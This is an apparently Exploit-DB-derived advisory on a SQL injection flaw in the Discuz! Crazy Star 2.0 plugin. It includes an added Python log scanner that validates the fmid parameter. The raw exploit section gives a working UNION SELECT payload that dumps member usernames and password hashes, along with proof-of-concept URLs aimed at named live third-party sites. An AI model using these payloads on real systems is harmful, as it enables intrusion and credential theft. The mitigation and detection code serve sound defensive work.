Vendor: Discuz! Plugin Crazy Star
By: ZhaoHuAn
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Discuz! Plugin Crazy Star
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: NO
Related CWE: N/A
CPE: a:discuz:discuz_plugin_crazy_star
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Discuz! Plugin Crazy Star <= 2.0 SQL Injection Vulnerability

Discuz! Plugin Crazy Star version 2.0 contains a SQL injection vulnerability. An attacker can exploit it by sending a specially crafted HTTP request to the vulnerable application, which can expose sensitive information stored in the database, such as usernames and passwords.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
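
Since no patch exists, the same validation can be applied outside the plugin. The following added example (not part of the original advisory or the plugin's code) applies a strict integer allow-list to the `fmid` parameter of logged `plugin.php?identifier=family` requests; the log format, sample lines and function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a combined-format access log (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
# Allow-list: fmid is a record id, so only a short run of ASCII digits is valid.
STRICT_INT = re.compile(r"[0-9]{1,10}")

# Constructed sample lines (documentation addresses, shortened payload).
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Aug/2009:10:00:00 +0800] "GET /plugin.php?identifier=family'
    '&module=family&action=view&fmid=6 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [26/Aug/2009:10:00:05 +0800] "GET /bbs/plugin.php?identifier=family'
    '&module=family&action=view&fmid=1+and+1=2+union+select+1,2,3 HTTP/1.1" 200 7301',
    '192.0.2.10 - - [26/Aug/2009:10:00:09 +0800] "GET /plugin.php?identifier=other'
    '&fmid=abc HTTP/1.1" 200 811',
]

def fmid_is_valid(value):
    """Return True only when the whole value is 1-10 ASCII digits."""
    return STRICT_INT.fullmatch(value) is not None

def check_request(target):
    """Return the offending fmid of a family-plugin request, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/plugin.php"):
        return None
    query = parse_qs(parts.query, keep_blank_values=True)
    if "family" not in query.get("identifier", []):
        return None
    for value in query.get("fmid", []):
        if not fmid_is_valid(value):
            return value  # decoded value, e.g. "1 and 1=2 union select ..."
    return None

def scan(lines):
    """Return (line_number, bad_fmid) for every request that fails the check."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        bad = check_request(match.group(1)) if match else None
        if bad is not None:
            findings.append((number, bad))
    return findings

if __name__ == "__main__":
    for number, bad in scan(SAMPLE_LOG):
        print(f"line {number}: non-numeric fmid {bad!r}")
```

The same `fmid_is_valid` rule, enforced at a reverse proxy or WAF in front of the forum, rejects the request before it reaches the plugin.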

Exploit-DB raw data:

============================================================
Discuz! Plugin Crazy Star <= 2.0 Sql injection Vulnerability
============================================================

========================[Author]============================                    

 [+] Founded 	: ZhaoHuAn				     
 [+] Contact	: ZhengXing[at]shandagames[dot]com	         
 [+] Blog	: http://www.patching.net/zhaohuan/	         
 [+] Date	: August, 26th 2009 [Double Seventh Festival]	 
								 
========================[Soft Info]=========================		 
								 
Software: Discuz! Plugin Crazy Star(family)		         
Version	: 2.0					                 
Vendor	: http://www.discuz.com			             	 



[-] Exploit:
[+] 1) Register a User
    2) Login!
[+] and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,group_concat(uid,0x3a,username,0x3a,password),25,26,27,28,29,30,31 from cdb_members--

[-] SqlI PoC:
[+] http://target/[path]/plugin.php?identifier=family&module=family&action=view&fmid=1+and+1=2+unIon+selecT+ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,group_concat(uid,0x3a,username,0x3a,password),25,26,27,28,29,30,31 from cdb_members--
    [?] = Valid fmid Number

[+] Demo Live:
[-] http://sj.netease.com/plugin.php?identifier=family&module=family&action=view&fmid=6+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,group_concat(uid,0x3a,username,0x3a,password),19,20,21,22,23,24,25,26,27,28,29,30,31 from bbs_members--

[-] http://www.war3club.net/plugin.php?identifier=family&module=family&action=view&fmid=11+and+1=2+unIon+selecT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,group_concat(uid,0x3a,username,0x3a,password),25,26,27,28,29,30,31,32,33 from cdb_members--


/---------------------------------------------www.zhaohuan.net-------------------------------------------------\  

  Today is the VALENTINE'S Day in China, the seventh day of the seventh lunar month.
  Raise your head on August 26 and gaze at the stars, you will find something romantic going on in the sky  ;) 
  Greetz : Weeny <- love u more & more

\--------------------------------------------------------------------------------------------------------------/

# milw0rm.com [2009-08-26]